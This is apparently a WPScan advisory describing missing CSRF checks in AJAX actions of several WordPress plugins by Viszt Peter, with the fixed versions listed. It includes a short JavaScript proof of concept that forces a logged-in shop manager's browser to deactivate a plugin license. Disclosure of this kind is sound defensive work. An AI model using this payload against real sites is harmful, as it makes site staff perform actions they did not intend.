WordPress Plugin Vulnerabilities
Multiple Plugins from Viszt Peter - Multiple CSRF
Description
The plugins are lacking CSRF checks in various AJAX actions, which could allow attackers to make logged in Shop Managers and above perform unwanted actions, such as deactivate the plugin's license
Proof of Concept
With the woo-billingo-plus plugin installed, make a logged in user with the edit_shop_orders capability open a page containing the below JS code
fetch('https://example.com/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=wc_billingo_plus_license_deactivate',
redirect: 'follow'
}).then(response => response.text()).then(result =>
console.log(result)).catch(error => console.log('error', error));
For other plugins, juts change the action parameter accordingly
Affects Plugins
Fixed in 4.4.5.4
Fixed in 1.0.4
Fixed in 1.2.7
Fixed in 5.6.3.3
Fixed in 1.9.0.3 References
CVE
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-14 (about 1 years ago)
Added
2022-09-14 (about 1 years ago)
Last Updated
2022-10-20 (about 1 years ago)
WPScan 